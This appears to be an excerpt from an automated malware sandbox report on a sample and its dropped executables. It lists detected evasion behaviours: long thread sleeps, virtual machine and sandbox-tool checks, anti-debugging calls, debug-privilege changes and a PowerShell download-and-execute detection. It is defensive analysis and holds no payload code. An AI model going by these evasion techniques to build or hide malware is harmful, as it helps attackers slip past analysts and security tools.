Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8108	Thread sleep count: 1066 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8108	Thread sleep time: -2133066s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8092	Thread sleep count: 1130 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8092	Thread sleep time: -2261130s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8096	Thread sleep count: 1113 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8096	Thread sleep time: -2227113s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8064	Thread sleep count: 216 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8064	Thread sleep time: -6480000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8080	Thread sleep count: 1111 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8080	Thread sleep time: -2223111s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8084	Thread sleep count: 1049 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8084	Thread sleep time: -2099049s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8100	Thread sleep count: 1133 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8100	Thread sleep time: -2267133s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7572	Thread sleep time: -16602069666338586s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7512	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7552	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4444	Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4444	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE TID: 8016	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7948	Thread sleep count: 4087 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7980	Thread sleep count: 590 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3704	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2536	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1888	Thread sleep count: 4019 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2792	Thread sleep count: 167 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7860	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3796	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 412	Thread sleep count: 3276 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6112	Thread sleep count: 466 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1988	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2176	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7740	Thread sleep time: -15679732462653109s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2124	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3096	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3020	Thread sleep count: 3795 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3320	Thread sleep count: 520 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7108	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7108	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7120	Thread sleep count: 5222 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6192	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7096	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7148	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe TID: 7024	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE TID: 6120	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7532	Thread sleep count: 4144 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7404	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7556	Thread sleep time: -1844674407370954s >= -30000s

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F7DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	8_2_00F7DBBE
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F868EE FindFirstFileW,FindClose,	8_2_00F868EE
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F8698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	8_2_00F8698F
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F7D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	8_2_00F7D076
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F7D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	8_2_00F7D3A9
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F89642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	8_2_00F89642
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F8979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	8_2_00F8979D
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F89B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	8_2_00F89B2B
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F85C97 FindFirstFileW,FindNextFileW,FindClose,	8_2_00F85C97
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Code function: 30_2_00406301 FindFirstFileW,FindClose,	30_2_00406301
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Code function: 30_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	30_2_00406CC7

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

8_2_00F142DE

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: skotes.exe, skotes.exe, 00000006.00000002.2981360890.0000000000AD7000.00000040.00000001.01000000.00000007.sdmp, TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE, TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE, 00000017.00000002.2447754863.000000000082D000.00000040.00000001.01000000.00000011.sdmp, 483d2fa8a0d53818306efeb32d3.exe, 0000002E.00000002.2476445885.0000000000709000.00000040.00000001.01000000.00000015.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: powershell.exe, 00000010.00000002.3251913835.0000024E79E7C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(-
Source: powershell.exe, 0000000D.00000002.2318906148.0000000007664000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y"\|
Source: powershell.exe, 00000024.00000002.2470935295.0000000007300000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\5
Source: skotes.exe, 00000006.00000002.2988300035.0000000001347000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWw
Source: mshta.exe, 0000000F.00000003.2286431742.0000020E49699000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\^
Source: powershell.exe, 00000024.00000002.2470935295.0000000007300000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: mshta.exe, 0000000A.00000003.2263100502.0000000003238000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}s~e
Source: mshta.exe, 00000032.00000003.2423868229.00000000027AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}77#G
Source: k6Sly2p.exe, 00000007.00000002.2464434325.0000000002911000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen
Source: mshta.exe, 00000022.00000002.2374702831.00000000032F7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}I0*A
Source: skotes.exe, 00000006.00000002.2988300035.0000000001347000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2988300035.0000000001308000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: mshta.exe, 0000000A.00000003.2263100502.0000000003238000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\[AM
Source: powershell.exe, 0000000D.00000002.2318906148.0000000007664000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: mshta.exe, 00000032.00000003.2423868229.00000000027AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\P7
Source: k6Sly2p.exe, 00000007.00000002.2464434325.0000000002911000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft\|VMWare\|Virtual
Source: powershell.exe, 00000024.00000002.2497298201.0000000008620000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: mshta.exe, 0000000F.00000003.2286431742.0000020E49699000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\+
Source: DhqvS8pXj8.exe, 00000000.00000002.1715108275.00000000004B7000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1733086772.0000000000AD7000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1741388551.0000000000AD7000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.2981360890.0000000000AD7000.00000040.00000001.01000000.00000007.sdmp, TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE, 00000017.00000002.2447754863.000000000082D000.00000040.00000001.01000000.00000011.sdmp, 483d2fa8a0d53818306efeb32d3.exe, 0000002E.00000002.2476445885.0000000000709000.00000040.00000001.01000000.00000015.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: powershell.exe, 0000000D.00000002.2319375250.00000000076B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2408210449.0000000000AE4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000034.00000002.2550594395.0000000007940000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll00Y

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	File opened: NTICE
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	File opened: SICE
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe	Process queried: DebugPort

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe

Code function: 0_2_05100BE7 rdtsc

0_2_05100BE7

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F8EAA2 BlockInput,

8_2_00F8EAA2

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F42622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

8_2_00F42622

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

8_2_00F142DE

Contains functionality to read the PEB

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0091652B mov eax, dword ptr fs:[00000030h]	6_2_0091652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0091A302 mov eax, dword ptr fs:[00000030h]	6_2_0091A302
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F34CE8 mov eax, dword ptr fs:[00000030h]	8_2_00F34CE8

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

8_2_00F70B62

Enables debug privileges

Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F42622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00F42622
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F3083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00F3083F
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F309D5 SetUnhandledExceptionFilter,	8_2_00F309D5
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F30C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00F30C21

Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi32_7396.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_7664.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_516.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_5100.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_6752.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: mshta.exe PID: 7204, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mshta.exe PID: 7604, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mshta.exe PID: 3900, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mshta.exe PID: 5440, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5100, type: MEMORYSTR
